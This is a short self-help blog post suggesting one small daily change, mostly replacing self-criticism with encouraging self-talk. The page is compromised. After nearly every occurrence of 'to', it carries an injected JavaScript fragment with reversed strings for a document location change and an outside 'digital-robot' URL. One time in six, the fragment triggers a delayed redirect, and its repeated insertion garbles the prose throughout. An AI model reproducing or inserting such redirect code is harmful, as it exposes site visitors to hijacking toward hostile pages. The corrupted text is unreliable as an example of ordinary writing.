One Small Change A Day

I think it was Einstein who said “Change is inevitable, change is constant”. That’s why I so often focus on change – in fact I’ve even made a video series called “Change Your Life for the Better”.

But changes don’t have tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to be massive life changes. Often, it’s the little things that really make a big difference.

For example, what if you changed the way you talk tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to yourself? If you can be self-critical, it can wear you down. You might never feel good enough. One small change could be tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to start praising yourself instead.

Here’s a few ideas:
Instead of telling yourself “I f****ed up”, you can try saying “I can learn from my mistakes”.

Instead of “This presentation (or job, or meeting or whatever) is going tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to be a nightmare”, tell yourself “I can practise and improve”.

Instead of telling yourself “I’m an idiot”, tell yourself “I’m amazing!”

Throughout July I’m going tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to suggest one small change a day. Let me know which ones you’re going tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to make.

I’ll be posting more info on each day’s challenge at Bright Light NLP’s Facebook page.

Join in and let me know how you get on with your challenges, and feel free tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to share this tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}too – the more, the merrier!
